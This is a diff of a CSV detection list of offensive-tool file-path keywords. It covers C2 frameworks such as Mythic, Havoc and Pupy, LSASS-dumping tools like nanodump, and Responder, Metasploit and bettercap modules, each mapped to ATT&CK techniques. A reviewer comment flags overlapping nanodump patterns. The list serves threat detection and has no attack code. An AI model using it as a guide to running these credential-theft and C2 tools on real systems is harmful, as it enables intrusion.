-"*/MythicAgents/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z"
-"*/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z"
-"*/MythicC2Profiles/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z"
-"*/mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z"
-"*/MythicConfig.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z"
-"*/mythic-react-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z"
+"*/Mythic/mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/Mythic_CLI*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/MythicAgents/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/MythicC2Profiles/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/MythicConfig.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/mythic-react-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
 "*/mzet-/les-res*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
-"*/n1nj4sec/pupy*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/n1nj4sec/pupy*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
 "*/nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
-"*/nanodump.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*/nanodump.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*/nanodump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*/nanorobeus.git*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z"
-"*/nanorubeus/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z"
-"*/Native/SigFlip/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
+"*/nanorubeus/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/Native/SigFlip/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
 "*/nat-pmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/nat-pmp-mapport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/nbd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/nbns-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/nbstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/NBTNS.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*/NBTNS.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
 "*/nccgroup/nccfsas/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
 "*/ncp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/ncp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
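Review bot: The added `*/nanodump.py*` row for NetExec is a strict subset of the two patterns directly above it, `*/nanodump*` (nanodump) and `*/nanodump.*` (havoc), so every hit on it also fires those two rules and the alert carries three different tool attributions. If the row is kept for attribution, the keyword needs something NetExec-specific in it, or the overlap should be recorded in `metadata_comment` instead of `"N/A"`, e.g. `"overlaps */nanodump* and */nanodump.* - tool attribution ambiguous"`. The row also reuses the generic NetExec technique list `T1069 - T1021 - T1136 - T1018` under the category `Credential Access`; if this file is the LSASS-dump module its name suggests, `T1003.001` (already used on the `*/nanodump*` row) looks like the missing mapping. Separately, the Mythic and Havoc rows rewritten in this hunk still spell sub-techniques with a hyphen (`T1573-001`) where the rest of the file uses the dotted ATT&CK form (`T1573.001`), so lookups keyed on technique ID will miss them.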
@@ -4437,36 +4472,37 @@ "*/ncrack.git*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*/ndmp-fs-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ndmp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ndp_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/ndp_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 
tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*/Needle_Sift_BOF/*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" -"*/nessus.py*","offensive_tool_keyword","crackmapexec","parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/nessus.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/nessus.py*","offensive_tool_keyword","crackmapexec","parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/nessus.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/nessus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nessus-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/net_recon/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*/net_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*/net_sniff_*.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - 
